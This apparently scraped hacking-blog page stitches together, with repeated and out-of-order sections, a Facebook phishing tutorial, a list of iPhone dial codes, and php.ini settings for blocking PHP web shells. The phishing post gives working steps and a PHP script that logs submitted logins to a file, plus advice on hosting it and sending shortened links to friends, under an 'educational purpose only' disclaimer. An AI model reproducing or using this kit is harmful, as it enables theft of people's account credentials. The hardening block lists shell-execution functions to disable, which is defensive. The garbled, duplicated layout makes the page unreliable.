*http://superfreehost.info/
*http://freehostia.com/
*http://funpic.de/
*http://freeweb7.com/
*http://t35.com/
*http://awardspace.com/
*http://phpnet.us/
*http://freewebhostingpro.com/
*http://prohosts.org/
*http://prohosts.org/
*http://byethost.com/
*http://000webhost.com/
*http://www.my5gb.com/
*http://www.oxyhost.com/
*http://www.rack111.com/
*http://0costwebhost.com/
*http://www.freezoka.com/
Step 5: After the Account is created (Eg: fakebook.t35.com) .Just go to Google Url Shortener and paste your link (fakebook.t35.com) and shorten the Url and which will look like http://goo.gl/cuSwY .Just give this link to your friends and after they have tried to login into your link .Just check the password in passwd.txt file.
http://fakebook.t35.com/passwd.txt .
Note: Don't use this method for hacking others account. This article is for educational purpose only.
Creating web page which look like any site is described as Phishing. By creating Phishing Web Page, you can make users to believe that it is original website and enter their id and password.
Step 1:
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
Step 3:
Now we need to create the "a.php" to store the password. so open the notepad and type the following code:
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save this file as "a.php"
Step 4:
open the notepad and just save the file as "passwd.txt" without any contents.
Now upload those three files(namely index.html,a.php,passwd.txt) in any of Free Web hosting site.
For: Example:
*http://110mb.com/
*http://ripway.com/
*http://superfreehost.info/
*http://freehostia.com/
*http://funpic.de/
*http://freeweb7.com/
*http://t35.com/
*http://awardspace.com/
*http://phpnet.us/
*http://freewebhostingpro.com/
*http://prohosts.org/
*http://prohosts.org/
*http://byethost.com/
*http://000webhost.com/
*http://www.my5gb.com/
*http://www.oxyhost.com/
*http://www.rack111.com/
*http://0costwebhost.com/
*http://www.freezoka.com/
Step 5: After the Account is created (Eg: fakebook.t35.com) .Just go to Google Url Shortener and paste your link (fakebook.t35.com) and shorten the Url and which will look like http://goo.gl/cuSwY .Just give this link to your friends and after they have tried to login into your link .Just check the password in passwd.txt file.
http://fakebook.t35.com/passwd.txt .
Note: Don't use this method for hacking others account. This article is for educational purpose only.
Secret Codes For iPhones
Following are the secret codes for your i phone
1) *3001#12345#* and tap Call. Enter Field Mode.Field mode reveals many
of the inner settings of your iPhone,
specifically up-to-date network and cell information.
2) *#06# Displays your IMEI. No need to tap Call.IMEI is the unique
identifier for your cell phone hardware.
Together with your SIM information it identifies you to the provider
network.
3) *777# and tap Call. Account balance for prepaid iPhone.
4) *225# and tap Call. Bill Balance. (Postpaid only)
5) *646# and tap Call. Check minutes. (Postpaid only)These three are
pretty self explanatory.
6) *#21# and tap Call. Setting interrogation for call forwards.Discover
the settings for your call forwarding.
You’ll see whether you have voice, data, fax, sms, sync, async, packet
access, and pad access call forwarding
enabled or disabled.
7) *#30# and tap Call. Calling line presentation check.This displays whether
you have enabled or disabled the presentation of the calling line,
presumably the number of the party placing the call.
8) *#76# and tap Call. Check whether the connected line presentation is
enabled or not.State whether the connected line presentation is enabled
or disabled. Presumably similar to the calling line presentation.
9) *#43# and tap Call. Determine if call waiting is enabled.Displays call
waiting status for voice, data, fax, sms,sync data, async data, packet access
and pad access. Each item is either enabled or disabled.
10) *#61# and tap Call. Check the number for unanswered calls.Show the
number for
voice call forwarding when a call is unanswered. Also show the options for
data, fax, sms, sync, async, packet access and pad access.
11) *#62# and tap Call. Check the number for call forwarding if no service is
available.Just like the previous, except for no-service rather than no-answer
situations.
12) *#67# and tap Call. Check the number for call forwarding when the iPhone is
busy.And again, but for when the iPhone is busy.
13) *#33# and tap Call. Check for call control bars.Check all the usual suspects
(voice, data, fax, sms, etc) to see whether barring is enabled or disabled for
outgoing.
1) *3001#12345#* and tap Call. Enter Field Mode.Field mode reveals many
of the inner settings of your iPhone,
specifically up-to-date network and cell information.
2) *#06# Displays your IMEI. No need to tap Call.IMEI is the unique
identifier for your cell phone hardware.
Together with your SIM information it identifies you to the provider
network.
3) *777# and tap Call. Account balance for prepaid iPhone.
4) *225# and tap Call. Bill Balance. (Postpaid only)
5) *646# and tap Call. Check minutes. (Postpaid only)These three are
pretty self explanatory.
6) *#21# and tap Call. Setting interrogation for call forwards.Discover
the settings for your call forwarding.
You’ll see whether you have voice, data, fax, sms, sync, async, packet
access, and pad access call forwarding
enabled or disabled.
7) *#30# and tap Call. Calling line presentation check.This displays whether
you have enabled or disabled the presentation of the calling line,
presumably the number of the party placing the call.
8) *#76# and tap Call. Check whether the connected line presentation is
enabled or not.State whether the connected line presentation is enabled
or disabled. Presumably similar to the calling line presentation.
9) *#43# and tap Call. Determine if call waiting is enabled.Displays call
waiting status for voice, data, fax, sms,sync data, async data, packet access
and pad access. Each item is either enabled or disabled.
10) *#61# and tap Call. Check the number for unanswered calls.Show the
number for
voice call forwarding when a call is unanswered. Also show the options for
data, fax, sms, sync, async, packet access and pad access.
11) *#62# and tap Call. Check the number for call forwarding if no service is
available.Just like the previous, except for no-service rather than no-answer
situations.
12) *#67# and tap Call. Check the number for call forwarding when the iPhone is
busy.And again, but for when the iPhone is busy.
13) *#33# and tap Call. Check for call control bars.Check all the usual suspects
(voice, data, fax, sms, etc) to see whether barring is enabled or disabled for
outgoing.
How to secure your server from PHP Shells!
Adding these code in your php.ini file will protect your server from execution of Shells like c99,r57 or b374k.
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect
safe_mode = On
register_globals = Off
display_errors = Off
allow_url_fopen = Off
allow_url_include = Off
enable open_basedir(set it to webroot path)
safe_mode = On
register_globals = Off
display_errors = Off
allow_url_fopen = Off
allow_url_include = Off
enable open_basedir(set it to webroot path)
Subscribe to:
Posts (Atom)